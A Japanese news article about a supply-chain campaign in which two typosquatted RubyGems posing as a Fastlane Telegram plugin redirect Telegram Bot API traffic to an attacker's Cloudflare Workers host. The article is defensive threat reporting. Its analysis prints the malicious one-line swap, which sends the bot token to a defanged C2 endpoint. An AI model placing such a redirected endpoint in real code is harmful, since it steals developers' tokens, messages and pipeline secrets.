Ruby Gems を悪用した攻撃が発生:開発者のトークンやメッセージなどを窃取

Hackers Weaponize Ruby Gems To Exfiltrate Telegram Tokens and Messages

2025/06/04 CyberSecurityNews — RubyGems エコシステムを狙う巧妙なサプライチェーン攻撃が発生しているが、その背景には、ベトナムによる Telegram の全面的な禁止措置があるのかもしれない。この攻撃では、開発者の認証情報や通信内容を盗むために、Telegram の API 通信が攻撃者のインフラを経由するよう細工されている。このキャンペーンでは、正規の Fastlane プラグインを装う、2つのタイポスクワット Ruby gem が使用されている。それらの gem は、攻撃者が制御するインフラへと Telegram API のトラフィックを静かにリダイレクトし、Bot トークン/メッセージ内容/添付ファイルなどを収集する。

不可解なのは、このキャンペーンが発生したタイミングである。2025年5月21日にベトナム政府が、Telegram の全国的なブロックを命じた直後に、この悪意のパッケージが登場しているのだ。

この攻撃キャンペーンを背後で操る脅威アクターは、Telegram の利用制限により困っている開発者たちのニーズに目をつけたようだ。そして、これらの悪意ある Gem をプロキシ・プラグインとして売り出し、代替手段を探している開発者たちを巧妙に誘導し、悪意のコードを導入させたと推測される。

この機会主義的なアプローチは、地政学的イベントを標的とするサプライチェーン攻撃に、サイバー犯罪者たちが迅速に適応していることを示している。

このキャンペーンを、脅威追跡アクティビティを通じて特定した Socket.dev のアナリストたちは、Bui nam/buidanhnam/si_mobile という、別名で公開された悪意の gem も発見した。

悪意のパッケージ Fastlane-plugin-telegram-proxy と fastlane-plugin-proxy_teleram は、正規の fastlane-plugin-telegram プロジェクトを偽装するように設計されていた。 この正規の fastlane-plugin-telegram は 60万回以上のダウンロード数があり、CI/CD パイプラインから Telegram チャンネルへと、デプロイ通知を送信するために広く使用されている。

Malicious plugin (Source – Socket.dev)

この攻撃の巧妙さは、最小限のコード改変にある。攻撃者は、オリジナル・プロジェクトの README をコピーし、パブリック API は保持しながら、わずか1箇所だけに重要な変更を加えたが、期待されるプラグインの挙動は維持されている。

その結果として Fastlane は、機密資産を扱う CI/CD パイプライン内で動作しながら、署名キー/リリース用バイナリ/環境変数などを窃取するようになった。その影響が及ぶ範囲は、単なる認証情報の窃取だけに留まらず、ソフトウェアのビルドおよびリリースの仕組みそのものを侵害する可能性まで生み出している。

感染メカニズムの技術分析

この悪意の Gem は、シンプルさを極めた巧妙な手口を示しており、最小限のコード変更で最大の効果を生み出している。

攻撃者の戦略は、たった1行のコードを置き換えるというものであり、Telegram の正規 API エンドポイントから、攻撃者が管理する C2 (command and control) サーバへと、通信をリダイレクトさせるように設計されていた。

Telegram Bot API Proxy (Source – Socket.dev)

正規の Fastlane-plugin-telegram のメッセージは、標準のエンドポイントを使用して、Telegram の公式 API へとダイレクトに送信される:

uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")

しかし悪意のバージョンでは、この重要な行がハードコードされた C2 エンドポイントに置き換えられていた:

# Threat actor's proxy C2 endpoint; not Telegram
uri = URI.parse("https://rough-breeze-0c37[.]buidanhnam95[.]workers[.]dev/bot#{token}/sendMessage")

この巧妙なすり替えにより攻撃者は、プラグイン本来の機能を保ちながら、Bot トークン/チャット ID/メッセージ内容/アップロード・ファイルなどを、自動的に盗み取ることが可能になる。

悪意のエンドポイントは Cloudflare Workers 上にホストされており、あたかも無害な Telegram Bot API プロキシを装い、Bot トークンの保存や改変は行わないと主張している。

しかし、その実態は完全に不透明であり、ソースコードの公開も監査も一切行われておらず、 正規のプロキシ・サービスと呼べるような透明性が欠如している。

特に憂慮すべき点は、この攻撃手法の持続性である。一度盗まれたトークンは手動で無効化されるまで有効な状態を保つ。したがって、その間に被害者の Telegram ボットや関連するデータ・ストリームへの、不正アクセスが継続するという危険性が生じる。

ベトナム政府による Telegram の停止という措置が、Ruby gem 開発者たちが活用するエコシステムを止めてしまい、そこに目をつけた脅威アクターが、巧妙な情報窃取を仕掛けているようです。地政学的な動きとサイバー攻撃が結びつく、いまの時代らしさを感じす。よろしければ、Ruby で検索も、ご利用ください。